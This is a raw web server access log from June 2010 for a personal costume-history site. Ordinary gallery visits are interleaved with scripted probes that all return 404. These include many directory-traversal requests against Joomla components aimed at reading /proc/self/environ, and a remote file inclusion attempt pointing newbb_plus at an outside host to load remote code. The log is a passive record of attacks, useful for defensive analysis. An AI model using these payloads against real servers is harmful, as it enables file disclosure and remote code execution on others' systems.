209.44.120.2 - - [01/Jun/2010:02:36:12 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:02:36:12 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:02:36:12 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:02:36:13 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
209.44.120.2 - - [01/Jun/2010:02:36:13 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.186.60.116 - - [01/Jun/2010:02:36:25 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:02:36:25 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:02:36:29 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:02:36:30 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:02:36:48 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
213.186.60.116 - - [01/Jun/2010:02:36:49 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
118.129.166.213 - - [01/Jun/2010:02:37:10 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.46.195.237 - - [01/Jun/2010:02:37:55 -0500] "GET /logs/access_log.1167436800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.114.41.16 - - [01/Jun/2010:02:39:24 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:39:24 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:39:25 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
120.50.40.133 - - [01/Jun/2010:02:39:47 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
120.50.40.133 - - [01/Jun/2010:02:39:47 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.155.115.220 - - [01/Jun/2010:02:41:06 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:15 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
89.238.145.196 - - [01/Jun/2010:02:41:19 -0500] "GET /logs/access_log.1271462400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:02:41:19 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
94.155.115.220 - - [01/Jun/2010:02:41:19 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:20 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
89.238.145.196 - - [01/Jun/2010:02:41:21 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
94.155.115.220 - - [01/Jun/2010:02:41:21 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:21 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:21 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:21 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:21 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:23 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:25 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:25 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:25 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:25 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
94.155.115.220 - - [01/Jun/2010:02:41:26 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
89.238.145.196 - - [01/Jun/2010:02:41:29 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:02:41:29 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.238.145.196 - - [01/Jun/2010:02:41:29 -0500] "GET /logs/access_log.1271462400//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 358 "-""Mozilla/5.0"
118.129.166.213 - - [01/Jun/2010:02:41:37 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:41:38 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
118.129.166.213 - - [01/Jun/2010:02:41:38 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
93.114.41.16 - - [01/Jun/2010:02:42:22 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:42:22 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
93.114.41.16 - - [01/Jun/2010:02:42:23 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
122.171.4.43 - - [01/Jun/2010:02:42:44 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.google.co.in/search?hl=en&q=costumes+all+nations&revid=391117680&ei=QrYETNvSNYe4rAeDrvndAg&sa=X&oi=revisions_inline&resnum=0&ct=broad-revision&cd=4&ved=0CG4Q1QIoAw&cts=1275378161788""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:42:45 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:42:45 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:42:46 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:43:01 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:43:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
118.129.166.213 - - [01/Jun/2010:02:43:19 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
122.171.4.43 - - [01/Jun/2010:02:43:33 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:53 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:54 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:55 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:55 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:56 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:57 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:44:59 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:00 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:00 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:00 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:03 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:04 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:04 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:23 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2227 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:24 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:24 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:24 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:27 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:27 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:27 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:45:30 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
118.129.166.213 - - [01/Jun/2010:02:45:33 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
212.68.62.5 - - [01/Jun/2010:02:46:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:46:08 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
212.68.62.5 - - [01/Jun/2010:02:46:09 -0500] "GET /logs//index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
122.171.4.43 - - [01/Jun/2010:02:46:15 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:16 -0500] "GET /costume/costume85%20copy.JPG HTTP/1.1" 200 15605 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:16 -0500] "GET /costume/costume87%20copy.JPG HTTP/1.1" 200 16142 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:16 -0500] "GET /costume/costume86%20copy.JPG HTTP/1.1" 200 15576 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:16 -0500] "GET /costume/costume88%20copy.JPG HTTP/1.1" 200 16167 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:17 -0500] "GET /costume/costume89%20copy.JPG HTTP/1.1" 200 15870 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume91%20copy.JPG HTTP/1.1" 200 15666 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume92%20copy.JPG HTTP/1.1" 200 19543 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume93%20copy.JPG HTTP/1.1" 200 16031 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume94%20copy.JPG HTTP/1.1" 200 15637 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume90.JPG HTTP/1.1" 200 54972 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume95%20copy.JPG HTTP/1.1" 200 17593 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:18 -0500] "GET /costume/costume96%20copy.JPG HTTP/1.1" 200 16829 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:28 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://tomdolan.pconline.com/costume/thmb8.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
122.171.4.43 - - [01/Jun/2010:02:46:35 -0500] "GET /costume/104_JPG%20CD%20offer.jpg HTTP/1.1" 200 155727 "http://tomdolan.pconline.com/costume/cd-page1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)"
72.37.150.18 - - [01/Jun/2010:02:46:51 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
72.37.150.18 - - [01/Jun/2010:02:46:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
72.37.150.18 - - [01/Jun/2010:02:46:51 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
212.68.62.5 - - [01/Jun/2010:02:47:12 -0500] "GET //index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
